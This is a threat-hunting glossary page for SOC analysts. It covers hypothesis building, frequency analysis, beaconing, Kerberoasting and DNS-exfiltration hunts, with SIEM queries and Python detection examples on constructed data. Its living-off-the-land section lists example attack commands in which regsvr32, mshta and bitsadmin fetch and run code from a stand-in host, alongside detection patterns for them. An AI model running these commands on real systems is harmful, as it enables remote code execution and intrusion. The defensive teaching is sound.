SOC & Monitoring Glossary

Threat Hunting

Threat hunting is the proactive, hypothesis-driven search for hidden threats within an organization’s infrastructure—before any alerts are triggered. Unlike reactive detection methods, threat hunting assumes that attackers are already inside the network and actively searches for indicators of their presence.

Threat Hunting is based on the assumption: "Assume a breach." It’s not a matter of "if," but rather that attackers are already on the network. While SIEM and EDR respond to known signatures and rules, the threat hunter actively searches for anomalies, suspicious patterns, and Tactics, Techniques & Procedures (TTPs) that haven’t triggered an alert—because the attacker is flying under the radar.

Threat Hunting vs. Incident Response

Reactive Security (Traditional):

Alarm → SOC Analyst → Analysis → Response

Threat Hunting (Proactive):

Hypothesis → Data Collection → Analysis → Threat or False Positive

Hunt Cycle (PEAK Model):

  1. Formulate a hypothesis (e.g., "Attacker uses Living-off-the-Land binaries")
  2. Collect data (logs, EDR telemetry, NetFlow)
  3. Query / Analysis (SIEM queries, stack ranking, visualization)
  4. Result: Threat found or hypothesis discarded
  5. Learnings → New SIEM rules → Detection engineering

Threat hunting creates value EVEN IF nothing is found:

  • Confirms: Security controls work for this TTP
  • New SIEM rules emerge from the hunt logic
  • System knowledge grows (what is "normal" in this environment?)

Formulating Hypotheses - The Starting Point of Every Hunt

Sources of Hypotheses

1. MITRE ATT&CK:

> "Attackers in financial institutions frequently use T1053.005 (Scheduled Task) for persistence"

Hunt: Which scheduled tasks were recently created? Baseline: Which tasks are legitimate?

2. Threat Intelligence:

> "APT29 (Cozy Bear) is known to use: spear-phishing with Word macros, Cobalt Strike as a C2 framework, LDAP enumeration for AD reconnaissance"

Hunt: Were there any abnormal LDAP queries from workstations?

3. Anomaly-based:

> "DNS traffic to unknown domains between 3:00 a.m. and 5:00 a.m." → Possible C2 beacon or DNS exfiltration

4. Crown Jewel Analysis:

> "Our most valuable data is in SharePoint and SAP" → Hunt: Who accessed this data? Unusual access volumes?

5. Red Team / Penetration Test Findings:

> "Last penetration test: lateral movement via PsExec possible" → Hunt: has PsExec been used in the last 30 days?

Hypothesis Template:

> "I believe [attacker type] [Technique from ATT&CK] against [our asset], identifiable by [Indicator/Anomaly]"

Threat Hunting Techniques

1. Stack Counting / Frequency Analysis

Frequent activities are usually legitimate; rare ones may be suspicious.

Example: Parent-Child Process Analysis

// KQL (Kusto Query Language, Microsoft Sentinel):
DeviceProcessEvents
| summarize count() by ParentProcessName, ProcessCommandLine
| where count_ < 5                    // Rare combinations
| where ProcessCommandLine contains "powershell" or
        ProcessCommandLine contains "cmd.exe"
| order by count_ asc

Finding: winword.exe → powershell.exe (Word launches PowerShell?) → Suspicious! Possible macro execution

2. Long-tail analysis (what does the rarest X do?)

// Splunk:
index=windows EventCode=4688
| stats count by ParentProcessName, NewProcessName
| sort count asc
| head 20

Which process combinations occur only 1–2 times? Are these legitimate (admin tool) or suspicious?
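The two techniques above (stack counting in section 1 and the long-tail view in section 2) are the same computation seen from two ends: count every parent/child pair, then look at the bottom of the stack. The following added example is not from the original page or from any SIEM vendor; it runs the same logic in plain Python over a constructed sample of process-creation events (the tuples in SAMPLE_EVENTS stand in for DeviceProcessEvents or Event ID 4688 rows, and the Office/shell name sets are an assumption for the illustration):

```python
from collections import Counter

# Constructed sample of process-creation events as (parent, child) pairs.
# Stands in for DeviceProcessEvents / EventCode 4688 telemetry; not real data.
SAMPLE_EVENTS = (
    [("explorer.exe", "chrome.exe")] * 120
    + [("services.exe", "svchost.exe")] * 300
    + [("explorer.exe", "outlook.exe")] * 40
    + [("cmd.exe", "powershell.exe")] * 8          # admin scripting, common enough
    + [("winword.exe", "powershell.exe")] * 1      # rare: Word spawning PowerShell
    + [("excel.exe", "cmd.exe")] * 2               # rare: Excel spawning cmd
)

# Assumed name sets for the Office-to-shell check (illustration only).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "cmd.exe"}


def stack_count(events):
    """Frequency of each (parent, child) pair: the 'stack' in stack counting."""
    return Counter(events)


def long_tail(events, threshold=5):
    """Pairs seen fewer than `threshold` times, rarest first (the long-tail view)."""
    counts = stack_count(events)
    rare = [(pair, n) for pair, n in counts.items() if n < threshold]
    return sorted(rare, key=lambda item: item[1])


def office_spawning_shell(events, threshold=5):
    """Rare pairs where an Office application is the parent of a shell."""
    return [
        (pair, n)
        for pair, n in long_tail(events, threshold)
        if pair[0] in OFFICE_APPS and pair[1] in SHELLS
    ]


if __name__ == "__main__":
    # Same idea as the KQL/SPL queries: sort ascending and read the rarest rows.
    for (parent, child), n in long_tail(SAMPLE_EVENTS):
        print(f"{n:4d}  {parent} -> {child}")
    print("Office -> shell:", office_spawning_shell(SAMPLE_EVENTS))
```

In a real hunt the threshold is chosen against the size of the data set, and every rare pair still needs a baseline check (is this an admin tool, a software installer, a one-off support session?) before it becomes a finding.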

3. Network Baseline and Deviations

Suricata / Zeek + ELK:

  • Which internal hosts have outbound traffic to rare countries?
  • DNS queries: Domains with high entropy (DGA domains)?
  • Beaconing: periodic traffic at regular intervals?

Beaconing Detection (Logic):

For each Source-IP → Dest-IP combination: Calculate the interval between connections. If standard deviation < 10% of the mean → suspicious beaconing!
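The beaconing rule above (standard deviation of the inter-connection interval below 10% of the mean) in working form. This is an added example, not code from the original page or from RITA/Zeek; the connection records are constructed and the 10% threshold is the page's own value, exposed as the max_cv parameter:

```python
import statistics
from collections import defaultdict

# Constructed connection records: (timestamp_seconds, src_ip, dst_ip). Not real traffic.
# 10.0.0.5 -> 203.0.113.10 connects roughly every 60 s with small jitter (beacon-like).
# 10.0.0.7 -> 198.51.100.20 connects at irregular, human-driven intervals.
# 10.0.0.9 -> 192.0.2.30 has too few connections to judge.
SAMPLE_CONNECTIONS = (
    [(t, "10.0.0.5", "203.0.113.10") for t in (0, 61, 119, 180, 242, 300, 359, 421)]
    + [(t, "10.0.0.7", "198.51.100.20") for t in (0, 5, 140, 142, 600, 601, 1500, 1502)]
    + [(t, "10.0.0.9", "192.0.2.30") for t in (0, 30)]
)


def intervals_by_pair(connections):
    """Group timestamps per (src, dst) and return the gaps between consecutive connections."""
    by_pair = defaultdict(list)
    for ts, src, dst in connections:
        by_pair[(src, dst)].append(ts)
    gaps = {}
    for pair, stamps in by_pair.items():
        stamps.sort()
        gaps[pair] = [b - a for a, b in zip(stamps, stamps[1:])]
    return gaps


def beacon_score(gaps):
    """Coefficient of variation (population stdev / mean) of the gaps; low means regular."""
    if len(gaps) < 3 or statistics.mean(gaps) == 0:
        return None  # too few samples for a meaningful standard deviation
    return statistics.pstdev(gaps) / statistics.mean(gaps)


def find_beacons(connections, max_cv=0.10):
    """Flag pairs whose gaps vary by less than max_cv (10% of the mean, as in the text)."""
    found = []
    for pair, gaps in intervals_by_pair(connections).items():
        cv = beacon_score(gaps)
        if cv is not None and cv < max_cv:
            found.append((pair, round(statistics.mean(gaps), 1), round(cv, 3)))
    return found


if __name__ == "__main__":
    for (src, dst), mean_gap, cv in find_beacons(SAMPLE_CONNECTIONS):
        print(f"{src} -> {dst}: every ~{mean_gap}s, cv={cv}")
```

Two practical caveats: real beacons often add deliberate jitter, so the threshold is tuned per environment rather than fixed at 10%, and legitimate software (update checks, monitoring agents) also beacons, so the baseline of known-regular destinations must be subtracted before anything is escalated.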

4. Living-off-the-Land (LotL) Detection

Attackers use native Windows tools to bypass AV:

powershell.exe -enc <base64>                  :: Encoded Command
certutil.exe -decode malware.b64 output       :: File Download
regsvr32.exe /s /n /u /i:http://evil.com      :: COM Hijack
mshta.exe http://evil.com/script.hta          :: Remote HTA
wmic process call create "payload.exe"        :: WMI Process Launch
bitsadmin.exe /transfer malware http://evil.com/m.exe %temp%\m.exe

// Splunk Hunt:
index=windows EventCode=4688
| search NewProcessName IN ("certutil.exe", "bitsadmin.exe", "mshta.exe")
| table _time, ComputerName, ParentProcessName, CommandLine
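The Splunk search above lists every execution of the named binaries, which on most networks produces a long list of legitimate administrative use. The following added example (not from the original page or any vendor) takes the next step a hunter would: it matches the command-line patterns the page lists against constructed 4688-style events and records why each one was flagged, so that a plain certutil run by an administrator is not reported. The event layout, the regular expressions and the Office parent set are assumptions for the illustration:

```python
import re

# Constructed 4688-style process creation events. Not real logs.
SAMPLE_4688 = [
    {"host": "WS01", "parent": "explorer.exe", "process": "notepad.exe",
     "cmdline": "notepad.exe C:\\Users\\alice\\notes.txt"},
    {"host": "WS01", "parent": "winword.exe", "process": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"host": "WS02", "parent": "cmd.exe", "process": "certutil.exe",
     "cmdline": "certutil.exe -decode payload.b64 payload.exe"},
    {"host": "SRV01", "parent": "services.exe", "process": "certutil.exe",
     "cmdline": "certutil.exe -verify machine.cer"},      # benign admin use
    {"host": "WS03", "parent": "explorer.exe", "process": "mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/s.hta"},
]

# LOLBin name -> command-line patterns for the abuse the page lists.
# The binary name alone is only a weak signal; the pattern gives the reason.
LOLBIN_PATTERNS = {
    "powershell.exe": [r"(?i)\s-e(nc(odedcommand)?)?\s"],   # encoded command
    "certutil.exe":   [r"(?i)-decode\b", r"(?i)-urlcache\b"],
    "regsvr32.exe":   [r"(?i)/i:https?://"],
    "mshta.exe":      [r"(?i)https?://"],
    "bitsadmin.exe":  [r"(?i)/transfer\b"],
    "wmic.exe":       [r"(?i)process\s+call\s+create"],
}

# Assumed set of Office parents; a shell under one of these adds a reason.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def hunt_lolbins(events):
    """Return (host, process, reasons) for events matching a LOLBin abuse pattern."""
    findings = []
    for ev in events:
        name = ev["process"].lower()
        if name not in LOLBIN_PATTERNS:
            continue
        reasons = [p for p in LOLBIN_PATTERNS[name] if re.search(p, ev["cmdline"])]
        if ev["parent"].lower() in OFFICE_PARENTS:
            reasons.append("office-parent")
        if reasons:  # name match without a pattern match is not reported
            findings.append((ev["host"], name, reasons))
    return findings


if __name__ == "__main__":
    for host, proc, reasons in hunt_lolbins(SAMPLE_4688):
        print(host, proc, reasons)
```

The SRV01 certutil event is deliberately left unreported: it is the kind of row the bare Splunk search would return, and the point of the hunt is to separate it from the WS02 decode. In a SIEM the same reasoning becomes a second `where` stage on the command line, or a detection rule once the hunt has confirmed the pattern.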

5. Kerberoasting Hunt (Active Directory)

Attackers request service tickets and crack hashes offline.

// Event ID 4769 (Kerberos Service Ticket Requested):
index=windows EventCode=4769
| where TicketEncryptionType="0x17"     // RC4 encryption (weak!)
| stats count by TargetUserName, ServiceName, IpAddress
| where count > 10                       // Many requests = suspicious
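The SPL above groups by user, service and address, so an account requesting one RC4 ticket each for many different services is spread across many rows and may stay under the threshold. The following added example (not from the original page or any vendor) groups per requester instead and also counts distinct services, which is the shape Kerberoasting usually has; the events are constructed, and the distinct-service heuristic (min_services) is an addition to the page's count-based rule:

```python
from collections import defaultdict

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC, the weak type hunted here

# Constructed 4769-style events. Not real logs.
SAMPLE_4769 = (
    # one account requesting RC4 tickets for 12 different services in a burst
    [{"user": "jdoe", "service": f"svc_app{i:02d}", "ip": "10.0.0.42", "enc": RC4_HMAC}
     for i in range(12)]
    # a legacy application repeatedly asking for the same service with RC4: noisy, not enumeration
    + [{"user": "legacyapp", "service": "MSSQLSvc", "ip": "10.0.0.80", "enc": RC4_HMAC}] * 15
    # ordinary AES-encrypted ticket traffic
    + [{"user": "asmith", "service": "cifs", "ip": "10.0.0.51", "enc": "0x12"}] * 30
)


def rc4_request_summary(events):
    """Per (user, ip): number of RC4 ticket requests and the set of services requested."""
    summary = defaultdict(lambda: {"count": 0, "services": set()})
    for ev in events:
        if ev["enc"] != RC4_HMAC:
            continue
        key = (ev["user"], ev["ip"])
        summary[key]["count"] += 1
        summary[key]["services"].add(ev["service"])
    return summary


def kerberoast_candidates(events, min_requests=10, min_services=5):
    """Flag requesters with more than min_requests RC4 requests (the page's rule) and
    note whether they also span many distinct services (added heuristic)."""
    out = []
    for (user, ip), s in rc4_request_summary(events).items():
        if s["count"] > min_requests:
            out.append({"user": user, "ip": ip, "requests": s["count"],
                        "services": len(s["services"]),
                        "enumeration_like": len(s["services"]) >= min_services})
    # most enumeration-like first, then by request volume
    return sorted(out, key=lambda r: (-int(r["enumeration_like"]), -r["requests"]))


if __name__ == "__main__":
    for row in kerberoast_candidates(SAMPLE_4769):
        print(row)
```

Both jdoe and legacyapp exceed the request threshold, but only jdoe touches many services; the legacy application is a baseline finding (and a reason to move that service account to AES), not a suspected roast.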

6. DNS Exfiltration Hunt

Attackers tunnel data via DNS queries.

# Zeek log analysis:
# The column number of the query field depends on the dns.log schema;
# `zeek-cut query < dns.log` selects it by name instead of by position.
cat dns.log | awk '{print length($9), $9}' | sort -rn | head -n 20
# Long DNS queries? > 50 characters in subdomain?

# Python analysis (dns_queries and flag_as_suspicious are placeholders for
# the parsed log records and the reporting step):
import math
from collections import Counter

def calculate_entropy(s):
    # Shannon entropy in bits per character
    return -sum(c / len(s) * math.log2(c / len(s)) for c in Counter(s).values())

for query in dns_queries:
    subdomain = query.domain.split('.')[0]
    if len(subdomain) > 40:           # Long subdomain portion
        entropy = calculate_entropy(subdomain)
        if entropy > 3.5:             # High entropy → base64/hex
            flag_as_suspicious(query)
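The length-plus-entropy check above end to end, as an added example that is not from the original page or from the Zeek project: it parses a constructed Zeek dns.log excerpt by its #fields header (so the query column is found by name rather than by the fragile $9 position), then applies the page's 40-character and 3.5-bit thresholds. The log lines and the domains in them are constructed:

```python
import math
from collections import Counter

# Constructed Zeek dns.log excerpt (tab-separated, with the #fields header). Not real logs.
SAMPLE_DNS_LOG = (
    "#separator \\x09\n"
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto"
    "\ttrans_id\trtt\tquery\tqclass\tqtype_name\n"
    "1700000000.1\tC1\t10.0.0.5\t51000\t10.0.0.53\t53\tudp\t1\t0.01\twww.example.com\t1\tA\n"
    "1700000001.2\tC2\t10.0.0.5\t51001\t10.0.0.53\t53\tudp\t2\t0.01\tmail.example.com\t1\tA\n"
    # long, high-entropy first label: the shape of encoded data in a subdomain
    "1700000002.3\tC3\t10.0.0.9\t51002\t10.0.0.53\t53\tudp\t3\t0.02\t"
    "k3j9x2m7q1w8e4r6t0y5u2i8o3p7a1s4d9f2g6h5z8c3v7b1.t.example.net\t1\tTXT\n"
    # long but low-entropy first label: passes the length test, fails the entropy test
    "1700000003.4\tC4\t10.0.0.9\t51003\t10.0.0.53\t53\tudp\t4\t0.02\t"
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.example.org\t1\tA\n"
)


def parse_zeek_log(text):
    """Yield one dict per record, naming columns from the #fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            yield dict(zip(fields, line.split("\t")))


def calculate_entropy(s):
    """Shannon entropy in bits per character (0.0 for the empty string)."""
    n = len(s)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def hunt_dns_exfil(text, min_len=40, min_entropy=3.5):
    """Return (client_ip, query, entropy) for queries whose first label is long and random-looking."""
    flagged = []
    for rec in parse_zeek_log(text):
        label = rec["query"].split(".")[0]
        if len(label) > min_len:
            entropy = calculate_entropy(label)
            if entropy > min_entropy:
                flagged.append((rec["id.orig_h"], rec["query"], round(entropy, 2)))
    return flagged


if __name__ == "__main__":
    for client, query, entropy in hunt_dns_exfil(SAMPLE_DNS_LOG):
        print(f"{client}  entropy={entropy}  {query}")
```

Per-query scoring is only the first pass; in a real hunt the flagged queries are then stacked per client and per parent domain, because exfiltration shows up as many such queries to one domain, while a single odd label is usually a CDN or anti-spam lookup.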

Threat Hunting Tools

SIEM Platforms

Platform | Features
Microsoft Sentinel | KQL, Jupyter Notebooks, MITRE ATT&CK integration
Splunk SIEM | SPL queries, Phantom SOAR integration
Elastic SIEM | EQL (Event Query Language), Kibana
QRadar | AQL, MITRE ATT&CK mapping

EDR Platforms (for Endpoint Telemetry)

Platform | Features
CrowdStrike Falcon | Threat Graph, RTR (Remote Response)
Microsoft Defender | Advanced Hunting (KQL), MDE logs
SentinelOne | Deep Visibility, story-based analysis
Carbon Black | Live Query, Process Trees

Specialized Tools

Tool | Function
Zeek (Bro) | Network traffic analysis, protocol logs
RITA | Detection of beaconing, C2 communication
Velociraptor | Endpoint forensics, hunting at scale
OSQuery | SQL-like endpoint queries
Hayabusa | Fast Windows event log analysis (Rust)
Chainsaw | Windows event log hunting
yarGen / YARA | Malware hunting with YARA rules

MITRE ATT&CK as a Hunting Framework

ATT&CK Categories for Systematic Hunting

Category | Hunt Focus
Reconnaissance (T1590-T1598) | Suspicious DNS lookups against internal systems; port scanning of internal hosts
Initial Access (T1566-T1199) | Phishing attachments (Office macros, ISO files); VPN logins from unusual geolocations
Execution (T1059) | PowerShell with encoded commands; WMI remote execution
Persistence (T1053, T1547) | New scheduled tasks; registry run keys
Privilege Escalation (T1548, T1134) | UAC bypass techniques; token impersonation
Defense Evasion (T1562, T1070) | Event log deletion (Event Code 1102); antivirus disablement
Credential Access (T1003, T1558) | LSASS access (Mimikatz); Kerberoasting (Event Code 4769)
Lateral Movement (T1021) | PsExec usage; WinRM from unusual hosts
Exfiltration (T1041, T1048) | Large amounts of data exfiltrated via HTTPS; DNS tunneling

ATT&CK Hunt Prioritization:

  • Which techniques are most common in our industry? (CISA Alerts)
  • Which ones have we not yet covered? (Coverage Matrix)
  • Which ones have a high impact but low detection probability?

Threat Hunting Maturity Model

Level 0 - Reactive

  • Alarm-based response only
  • No proactive hunting
  • Many SIEM alerts, little context

Level 1 - Minimal

  • IOC-based hunting (IP/domain/hash lists)
  • Threat intelligence feeds are cross-referenced
  • No hypothesis-based hunting yet

Level 2 - Procedural

  • Hypotheses from ATT&CK
  • Standardized hunt playbooks
  • Detection engineering based on hunt results

Level 3 - Innovative

  • Machine learning for anomaly detection
  • Custom data sources (honeypots, deception)
  • Hunting results feed into red team scenarios

Level 4 - Leading

  • Automated hunting (SOAR-supported)
  • Crowdsourced threat intelligence
  • Continuous hunting programs with KPIs
  • Threat intelligence sharing with industry partners (ISACs)